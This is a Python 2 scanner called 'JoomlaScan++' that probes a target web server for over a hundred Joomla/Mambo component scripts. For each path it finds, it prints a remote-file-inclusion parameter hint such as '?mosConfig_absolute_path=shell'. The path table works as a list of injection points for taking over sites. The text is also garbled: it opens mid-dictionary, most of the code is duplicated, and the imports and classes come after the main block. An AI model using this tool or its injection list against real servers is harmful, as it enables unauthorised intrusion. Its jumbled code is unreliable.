"administrator/components/com_chronocontact/excelwriter/PPS/File.php" : "administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer.php" : "administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/PPS.php" : "administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php" : "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Format.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=shell",
"index.php?option=com_custompages" : "index.php?option=com_custompages&cpage=shell",
"component/com_onlineflashquiz/quiz/common/db_config.inc.php" : "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=shell",
"administrator/components/com_joomla-visites/core/include/myMailer.class.php" : "administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=shell",
"index.php?option=com_facileforms" : "components/com_facileforms/facileforms.frame.php?ff_compath=shell",
"administrator/components/com_rssreader/admin.rssreader.php" : "administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=shell",
"administrator/components/com_feederator/includes/tmsp/add_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/edit_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/subscription.php" : "administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_feederator/includes/tmsp/tmsp.php" : "administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/install.clickheat.php" : "administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/includes/heatmap/_main.php" : "administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/heatmap/main.php" : "administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/overview/main.php" : "administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Cache.php" : "administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php" : "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/common/GlobalVariables.php" : "administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/add.php" : "administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/competitions.php" : "administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/settings/settings.php" : "administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=shell",
"administrator/components/com_dadamail/config.dadamail.php" : "administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=shell",
"administrator/components/com_googlebase/admin.googlebase.php" : "administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=shell",
"administrator/components/com_ongumatimesheet20/lib/onguma.class.php" : "administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_treeg/admin.treeg.php" : "administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=shell"}
def usage():
    """Print the command-line help text and terminate with exit status 1."""
    # The text is emitted exactly as written. Its example mentions a -404
    # switch, which the getopt option string used by this script does not define.
    help_text = """\tUsage: ./joomlascan.py
\t[options]
\t -p/--proxy : Add proxy support
\t -e/--errors : Show Error responses
\t -j : path to joomla if needed
Ex: ./joomlascan.py www.test.com -404 -p 127.0.0.1:8080
"""
    print help_text
    sys.exit(1)
def testproxy(proxy):
    """Check that a TCP connection to the proxy can be opened.

    On any failure a warning is printed, the function sleeps for three
    seconds, and the module-level ``proxy`` setting is cleared, which makes
    runattack() connect to the target host directly.
    """
    # NOTE(review): the page lost its indentation; the sleep and the reset are
    # assumed to belong to the exception handler.
    try:
        conn = httplib.HTTPConnection(proxy)
        conn.connect()
    except:
        print "Proxy broke! Reverting to Direct Connect Ctrl-C Now if this scares you!"
        time.sleep(3)
        # The parameter shadows the module global of the same name, so the
        # global is reached through globals() instead of a ``global`` statement.
        globals()['proxy'] = ''
def testhost(host):
    """Exit with status 1 unless a TCP connection to ``host`` can be opened."""
    try:
        conn = httplib.HTTPConnection(host)
        conn.connect()
    except:
        # Bare except: every failure, whatever its cause, ends the program.
        print "Host down, or you're an idiot! Either way, I'm out of here!"
        sys.exit(1)
def runattack(apath,shell):
    """Request one path from the probe table and report the HTTP status.

    apath is the path that is requested; shell is the hint string stored next
    to it in ``paths`` and is only printed, never sent.  With a proxy set the
    request is a GET with an absolute URL sent to the proxy, otherwise a HEAD
    sent to the host.

    A 200 reply only shows that the script exists and is reachable; nothing
    here checks whether the include parameter named in the hint is honoured,
    so a "Found" line is not evidence of a vulnerable install.
    """
    settings = globals()
    proxy = settings['proxy']
    host = settings['host']
    path = settings['joomlapath']
    p404 = settings['p404']
    #print "Apath:",apath,"- Shell:",shell
    target = "/" + path + "/" + apath
    if not proxy:
        h = httplib.HTTP(host)
        h.putrequest("HEAD", target)
    else:
        h = httplib.HTTP(proxy)
        h.putrequest("GET", "http://" + host + target)
    # NOTE(review): indentation was lost on the page; the Host header and
    # endheaders() are assumed to apply to both branches.
    h.putheader("Host", host)
    h.endheaders()
    try:
        status, reason, headers = h.getreply()
        if status == 200:
            print 'Found: '+apath+': Use Shell: '+shell
        elif p404:
            print 'Not Found:',apath,status,reason
    except(), msg:
        # An empty tuple matches no exception type, so this handler never
        # runs; a failing getreply() propagates to the calling worker thread.
        print "Error Occurred:",msg
if __name__=="__main__":
    # Command-line driver: parse options, check connectivity, then queue one
    # request per entry of ``paths`` on a pool of 20 worker threads.  The
    # resulting burst of requests for many distinct component paths from one
    # client is what shows up in the target's access log.
    import getopt,sys
    print "\n\tJoomlaScan++ - Now Not As Ghey!"
    print "\t--------------------------------------------"
    try:
        # The parser is given -h, -e, -p <arg>, -j <arg>, --help and
        # --output=<arg>; any other switch raises and prints the help text.
        opts, args = getopt.getopt(sys.argv[1:], "hep:j:", ["help", "output="])
    except getopt.GetoptError:
        usage()
    socket.setdefaulttimeout(6)
    p404, proxy, host, joomlapath = False, '', '', ''
    for flag, value in opts:
        if flag == "-v":
            # Not reachable with the option string above; kept as in the original.
            verbose = True
        elif flag in ("-h", "--help"):
            usage()
        elif flag in ("-p", "--proxy"):
            proxy = value
        elif flag in ("-e","--errors"):
            p404 = True
        elif flag in ("-j","--joomlapath"):
            joomlapath = value
        else:
            usage()
    if not args:
        usage()
    else:
        host = args[0]
    if proxy:
        testproxy(proxy)
    testhost(host)
    attackpool = ThreadPool(20)
    # Each (path, hint) pair becomes the positional arguments of runattack().
    for item in paths.items():
        attackpool.putRequest(WorkRequest(runattack, item))
    print "Main thread working..."
    while True:
        try:
            attackpool.poll()
            time.sleep(0.5)
        except KeyboardInterrupt:
            print "User Break... Exiting..."
            break
        except NoResultsPending:
            print "Scan Finished: Exiting."
            break
import httplib,time,socket
import threading, Queue
class NoResultsPending(Exception):
    """Raised by ThreadPool.poll() when no submitted request is outstanding."""
class NoWorkersAvailable(Exception):
    """Raised by a blocking ThreadPool.poll() when the pool has no workers left."""
class WorkerThread(threading.Thread):
    """Daemon thread that moves work from a request queue to a result queue.

    The thread takes request objects from one queue, calls
    ``request.callable(*request.args, **request.kwds)`` and puts the pair
    ``(request, return value)`` on the other queue until it is dismissed.
    """

    def __init__(self, requestsQueue, resultsQueue, **kwds):
        """Store both queues, mark the thread as a daemon and start it.

        Extra keyword arguments are passed on to threading.Thread.
        """
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workRequestQueue = requestsQueue
        self.resultQueue = resultsQueue
        self._dismissed = threading.Event()
        self.start()

    def run(self):
        """Serve requests until the dismissed flag is set."""
        while not self._dismissed.isSet():
            # Blocks while the request queue is empty.
            job = self.workRequestQueue.get()
            if self._dismissed.isSet():
                # Dismissed while waiting: hand the request back and stop.
                self.workRequestQueue.put(job)
                break
            # XXX An exception raised by the callable is not caught: it ends
            # this thread and no result is ever queued for the request.
            self.resultQueue.put(
                (job, job.callable(*job.args, **job.kwds))
            )

    def dismiss(self):
        """Ask the thread to stop once its current request is finished."""
        self._dismissed.set()
class WorkRequest:
    """One unit of work for the pool: a callable plus its arguments.

    makeRequests() builds several of these for the same callable.
    """

    def __init__(self, callable, args=None, kwds=None, requestID=None,
                 callback=None):
        """Record the callable, its arguments and the optional callback.

        args is a list of positional arguments and kwds a dictionary of
        keyword arguments; a missing or empty value becomes a fresh ``[]`` or
        ``{}``.

        callback, if given, is called with the request object and its result
        (in that order) when the result is taken from the result queue.  Extra
        data for the callback can be attached to the request object.

        requestID must be hashable because ThreadPool uses it as a dictionary
        key; when it is None, id(self) is used.
        """
        self.requestID = id(self) if requestID is None else requestID
        self.callable = callable
        self.callback = callback
        self.args = args or []
        self.kwds = kwds or {}
class ThreadPool:
    """Pool of worker threads that hands out requests and collects results."""

    def __init__(self, num_workers, q_size=0):
        """Create both queues and start num_workers worker threads.

        q_size is passed to the request queue; when it is greater than zero
        the queue is bounded and putRequest() blocks while it is full.
        """
        self.requestsQueue = Queue.Queue(q_size)
        self.resultsQueue = Queue.Queue()
        self.workers = []
        # requestID -> request, for every request whose result is outstanding.
        self.workRequests = {}
        self.createWorkers(num_workers)

    def createWorkers(self, num_workers):
        """Start num_workers further worker threads."""
        for _ in range(num_workers):
            thread = WorkerThread(self.requestsQueue, self.resultsQueue)
            self.workers.append(thread)

    def dismissWorkers(self, num_workers):
        """Dismiss up to num_workers threads, most recently added first."""
        remaining = min(num_workers, len(self.workers))
        while remaining > 0:
            self.workers.pop().dismiss()
            remaining -= 1

    def putRequest(self, request):
        """Queue a request and remember it until its result is collected."""
        self.requestsQueue.put(request)
        self.workRequests[request.requestID] = request

    def poll(self, block=False):
        """Collect available results and run their callbacks.

        Raises NoResultsPending when no request is outstanding, and
        NoWorkersAvailable when block is true and the pool has no workers.
        Returns when the result queue is empty (non-blocking mode).
        """
        while True:
            if not self.workRequests:
                raise NoResultsPending
            if block and not self.workers:
                raise NoWorkersAvailable
            try:
                request, result = self.resultsQueue.get(block=block)
                if request.callback:
                    request.callback(request, result)
                del self.workRequests[request.requestID]
            except Queue.Empty:
                return

    def wait(self):
        """Block until every outstanding request has been collected."""
        try:
            while True:
                self.poll(True)
        except NoResultsPending:
            pass
def makeRequests(callable, args_list, callback=None):
    """Build one WorkRequest per entry of ``args_list.items()``.

    callback is stored on every request and is called when its result is
    taken from the result queue.

    NOTE(review): the test below compares each item with the boolean that
    isinstance() returns instead of using that boolean.  For the (key, value)
    tuples a dict yields, the comparison is false, so each request gets the
    whole tuple as its single positional argument and the two-argument branch
    is not taken.
    """
    built = []
    for entry in args_list.items():
        takes_pair = (entry == isinstance(entry, tuple))
        if takes_pair:
            req = WorkRequest(callable, entry[0], entry[1], callback=callback)
        else:
            req = WorkRequest(callable, [entry], None, callback=callback)
        built.append(req)
    return built
# Probe table: each key is a Joomla/Mambo component path that the scanner
# requests; each value is a hint string naming a request parameter of that
# script (presumably one the script uses as an include path).  "shell" in the
# hint is a placeholder: runattack() requests only the key and prints the value.
# For defenders: requests for many of these paths from one client within a few
# seconds are a recognisable scan pattern in web-server access logs, and the
# parameter names listed here (mosConfig_absolute_path, mosConfig_live_site,
# ...) arriving in a query string are worth alerting on.
paths = {"components/com_flyspray/startdown.php" : "startdown.php?file=shell",
"administrator/components/com_admin/admin.admin.html.php" : "admin.admin.html.php?mosConfig_absolute_path=shell",
"components/com_simpleboard/file_upload.php" : "file_upload.php?sbp=shell",
"components/com_hashcash/server.php" : "server.php?mosConfig_absolute_path=shell",
"components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php" : "config.inc.php?mosConfig_absolute_path=shell",
"components/com_sitemap/sitemap.xml.php" : "sitemap.xml.php?mosConfig_absolute_path=shell ",
"components/com_performs/performs.php" : "performs.php?mosConfig_absolute_path=shell",
"components/com_forum/download.php" : "download.php?phpbb_root_path=shell",
"components/com_pccookbook/pccookbook.php" : "pccookbook.php?mosConfig_absolute_path=shell",
"components/com_extcalendar/extcalendar.php" : "extcalendar.php?mosConfig_absolute_path=shell",
"components/minibb/index.php" : "index.php?absolute_path=shell",
"components/com_smf/smf.php" : "smf.php?mosConfig_absolute_path=",
"modules/mod_calendar.php" : "mod_calendar.php?absolute_path=shell ",
"components/com_pollxt/conf.pollxt.php" : "conf.pollxt.php?mosConfig_absolute_path=shell ",
"components/com_loudmounth/includes/abbc/abbc.class.php" : "abbc.class.php?mosConfig_absolute_path=shell",
"components/com_videodb/core/videodb.class.xml.php" : "videodb.class.xml.php?mosConfig_absolute_path=shell",
"components/com_pcchess/include.pcchess.php" : "include.pcchess.php?mosConfig_absolute_path=shell",
"administrator/components/com_multibanners/extadminmenus.class.php" : "extadminmenus.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" : "admin.a6mambohelpdesk.php?mosConfig_live_site=shell",
"administrator/components/com_colophon/admin.colophon.php" : "admin.colophon.php?mosConfig_absolute_path=shell",
"administrator/components/com_mgm/help.mgm.php" : "help.mgm.php?mosConfig_absolute_path=shell",
"components/com_mambatstaff/mambatstaff.php" : "mambatstaff.php?mosConfig_absolute_path=shell",
"components/com_securityimages/configinsert.php" : "configinsert.php?mosConfig_absolute_path=shell",
"components/com_securityimages/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"components/com_artlinks/artlinks.dispnew.php" : "artlinks.dispnew.php?mosConfig_absolute_path=shell",
"components/com_galleria/galleria.html.php" : "galleria.html.php?mosConfig_absolute_path=shell",
"akocomments.php" : "akocomments.php?mosConfig_absolute_path=shell",
"administrator/components/com_cropimage/admin.cropcanvas.php" : "admin.cropcanvas.php?cropimagedir=shell",
"administrator/components/com_kochsuite/config.kochsuite.php" : "config.kochsuite.php?mosConfig_absolute_path=shell",
"administrator/components/com_comprofiler/plugin.class.php" : "plugin.class.php?mosConfig_absolute_path=shell",
"components/com_zoom/classes/fs_unix.php" : "fs_unix.php?mosConfig_absolute_path=shell",
"components/com_zoom/includes/database.php" : "database.php?mosConfig_absolute_path=shell",
"administrator/components/com_serverstat/install.serverstat.php" : "install.serverstat.php?mosConfig_absolute_path=shell",
"components/com_fm/fm.install.php" : "fm.install.php?lm_absolute_path=shell",
"administrator/components/com_mambelfish/mambelfish.class.php" : "mambelfish.class.php?mosConfig_absolute_path=shell",
"components/com_lmo/lmo.php" : "lmo.php?mosConfig_absolute_path=shell",
"administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php" : "toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell",
"components/com_mtree/Savant2/Savant2_Plugin_textarea.php" : "Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell",
"administrator/components/com_jim/install.jim.php" : "install.jim.php?mosConfig_absolute_path=shell",
"administrator/components/com_webring/admin.webring.docs.php" : "admin.webring.docs.php?component_dir=shell",
"administrator/components/com_remository/admin.remository.php" : "admin.remository.php?mosConfig_absolute_path=shell",
"administrator/components/com_babackup/classes/Tar.php" : "Tar.php?mosConfig_absolute_path=shell",
"administrator/components/com_lurm_constructor/admin.lurm_constructor.php" : "admin.lurm_constructor.php?lm_absolute_path=shell",
"components/com_mambowiki/MamboLogin.php" : "MamboLogin.php?IP=shell",
"administrator/components/com_a6mambocredits/admin.a6mambocredits.php" : "admin.a6mambocredits.php?mosConfig_live_site=shell",
"administrator/components/com_phpshop/toolbar.phpshop.html.php" : "toolbar.phpshop.html.php?mosConfig_absolute_path=shell",
"components/com_cpg/cpg.php" : "cpg.php?mosConfig_absolute_path=shell",
"components/com_moodle/moodle.php" : "moodle.php?mosConfig_absolute_path=shell ",
"components/com_extended_registration/registration_detailed.inc.php" : "registration_detailed.inc.php?mosConfig_absolute_path=shell",
"components/com_mospray/scripts/admin.php" : "admin.php?basedir=shell",
"administrator/components/com_bayesiannaivefilter/lang.php" : "lang.php?mosConfig_absolute_path=shell",
"administrator/components/com_uhp/uhp_config.php" : "uhp_config.php?mosConfig_absolute_path=shell",
"administrator/components/com_peoplebook/param.peoplebook.php" : "param.peoplebook.php?mosConfig_absolute_path=shell",
"administrator/components/com_mmp/help.mmp.php" : "help.mmp.php?mosConfig_absolute_path=shell",
"components/com_reporter/processor/reporter.sql.php" : "reporter.sql.php?mosConfig_absolute_path=shell",
"components/com_madeira/img.php" : "img.php?url=shell",
"components/com_jd-wiki/lib/tpl/default/main.php" : "main.php?mosConfig_absolute_path=shell",
"components/com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
"components/com_slideshow/admin.slideshow1.php" : "admin.slideshow1.php?mosConfig_live_site=shell",
"administrator/components/com_panoramic/admin.panoramic.php" : "admin.panoramic.php?mosConfig_live_site=shell",
"administrator/components/com_mosmedia/includes/credits.html.php" : "credits.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/info.html.php" : "info.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.php" : "media.divs.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/media.divs.js.php" : "media.divs.js.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/purchase.html.php" : "purchase.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_mosmedia/includes/support.html.php" : "support.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_wmtportfolio/admin.wmtportfolio.php" : "admin.wmtportfolio.php?mosConfig_absolute_path=shell",
"components/com_mp3_allopass/allopass.php" : "components/com_mp3_allopass/allopass.php?mosConfig_live_site=shell",
"components/com_mp3_allopass/allopass-error.php" : "components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=shell",
"administrator/components/com_jcs/jcs.function.php" : "administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/add.php" : "administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/history.php" : "administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/view/register.php" : "administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.sub.html.php" : "administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/list.user.sub.html.php" : "administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=shell",
"administrator/components/com_jcs/views/reports.html.php" : "administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php" : "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"administrator/components/com_jjgallery/admin.jjgallery.php" : "administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=shell",
"administrator/components/com_juser/xajax_functions.php" : "administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=shell",
"components/com_jreviews/scripts/xajax.inc.php" : "components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=shell",
"com_directory/modules/mod_pxt_latest.php" : "com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/PPS/File.php" : "administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer.php" : "administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/PPS.php" : "administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php" : "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=shell",
"administrator/components/com_chronocontact/excelwriter/Writer/Format.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=shell",
"index.php?option=com_custompages" : "index.php?option=com_custompages&cpage=shell",
"component/com_onlineflashquiz/quiz/common/db_config.inc.php" : "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=shell",
"administrator/components/com_joomla-visites/core/include/myMailer.class.php" : "administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=shell",
"index.php?option=com_facileforms" : "components/com_facileforms/facileforms.frame.php?ff_compath=shell",
"administrator/components/com_rssreader/admin.rssreader.php" : "administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=shell",
"administrator/components/com_feederator/includes/tmsp/add_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/edit_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_feederator/includes/tmsp/subscription.php" : "administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_feederator/includes/tmsp/tmsp.php" : "administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/install.clickheat.php" : "administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/includes/heatmap/_main.php" : "administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/heatmap/main.php" : "administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/includes/overview/main.php" : "administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Cache.php" : "administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php" : "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_clickheat/Recly/common/GlobalVariables.php" : "administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/add.php" : "administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/competitions/competitions.php" : "administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=shell",
"administrator/components/com_competitions/includes/settings/settings.php" : "administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=shell",
"administrator/components/com_dadamail/config.dadamail.php" : "administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=shell",
"administrator/components/com_googlebase/admin.googlebase.php" : "administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=shell",
"administrator/components/com_ongumatimesheet20/lib/onguma.class.php" : "administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=shell",
"administrator/components/com_treeg/admin.treeg.php" : "administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=shell"}
def usage():
    """Print the command-line help text and terminate with exit status 1."""
    # The text is emitted exactly as written. Its example mentions a -404
    # switch, which the getopt option string used by this script does not define.
    help_text = """\tUsage: ./joomlascan.py
\t[options]
\t -p/--proxy
\t -e/--errors : Show Error responses
\t -j : path to joomla if needed
Ex: ./joomlascan.py www.test.com -404 -p 127.0.0.1:8080
"""
    print help_text
    sys.exit(1)
def testproxy(proxy):
    """Check that a TCP connection to the proxy can be opened.

    On any failure a warning is printed, the function sleeps for three
    seconds, and the module-level ``proxy`` setting is cleared, which makes
    runattack() connect to the target host directly.
    """
    # NOTE(review): the page lost its indentation; the sleep and the reset are
    # assumed to belong to the exception handler.
    try:
        conn = httplib.HTTPConnection(proxy)
        conn.connect()
    except:
        print "Proxy broke! Reverting to Direct Connect Ctrl-C Now if this scares you!"
        time.sleep(3)
        # The parameter shadows the module global of the same name, so the
        # global is reached through globals() instead of a ``global`` statement.
        globals()['proxy'] = ''
def testhost(host):
    """Exit with status 1 unless a TCP connection to ``host`` can be opened."""
    try:
        conn = httplib.HTTPConnection(host)
        conn.connect()
    except:
        # Bare except: every failure, whatever its cause, ends the program.
        print "Host down, or you're an idiot! Either way, I'm out of here!"
        sys.exit(1)
def runattack(apath,shell):
    """Request one path from the probe table and report the HTTP status.

    apath is the path that is requested; shell is the hint string stored next
    to it in ``paths`` and is only printed, never sent.  With a proxy set the
    request is a GET with an absolute URL sent to the proxy, otherwise a HEAD
    sent to the host.

    A 200 reply only shows that the script exists and is reachable; nothing
    here checks whether the include parameter named in the hint is honoured,
    so a "Found" line is not evidence of a vulnerable install.
    """
    settings = globals()
    proxy = settings['proxy']
    host = settings['host']
    path = settings['joomlapath']
    p404 = settings['p404']
    #print "Apath:",apath,"- Shell:",shell
    target = "/" + path + "/" + apath
    if not proxy:
        h = httplib.HTTP(host)
        h.putrequest("HEAD", target)
    else:
        h = httplib.HTTP(proxy)
        h.putrequest("GET", "http://" + host + target)
    # NOTE(review): indentation was lost on the page; the Host header and
    # endheaders() are assumed to apply to both branches.
    h.putheader("Host", host)
    h.endheaders()
    try:
        status, reason, headers = h.getreply()
        if status == 200:
            print 'Found: '+apath+': Use Shell: '+shell
        elif p404:
            print 'Not Found:',apath,status,reason
    except(), msg:
        # An empty tuple matches no exception type, so this handler never
        # runs; a failing getreply() propagates to the calling worker thread.
        print "Error Occurred:",msg
if __name__=="__main__":
    # Command-line driver: parse options, check connectivity, then queue one
    # request per entry of ``paths`` on a pool of 20 worker threads.  The
    # resulting burst of requests for many distinct component paths from one
    # client is what shows up in the target's access log.
    import getopt,sys
    print "\n\tJoomlaScan++ - Now Not As Ghey!"
    print "\t--------------------------------------------"
    try:
        # The parser is given -h, -e, -p <arg>, -j <arg>, --help and
        # --output=<arg>; any other switch raises and prints the help text.
        opts, args = getopt.getopt(sys.argv[1:], "hep:j:", ["help", "output="])
    except getopt.GetoptError:
        usage()
    socket.setdefaulttimeout(6)
    p404, proxy, host, joomlapath = False, '', '', ''
    for flag, value in opts:
        if flag == "-v":
            # Not reachable with the option string above; kept as in the original.
            verbose = True
        elif flag in ("-h", "--help"):
            usage()
        elif flag in ("-p", "--proxy"):
            proxy = value
        elif flag in ("-e","--errors"):
            p404 = True
        elif flag in ("-j","--joomlapath"):
            joomlapath = value
        else:
            usage()
    if not args:
        usage()
    else:
        host = args[0]
    if proxy:
        testproxy(proxy)
    testhost(host)
    attackpool = ThreadPool(20)
    # Each (path, hint) pair becomes the positional arguments of runattack().
    for item in paths.items():
        attackpool.putRequest(WorkRequest(runattack, item))
    print "Main thread working..."
    while True:
        try:
            attackpool.poll()
            time.sleep(0.5)
        except KeyboardInterrupt:
            print "User Break... Exiting..."
            break
        except NoResultsPending:
            print "Scan Finished: Exiting."
            break
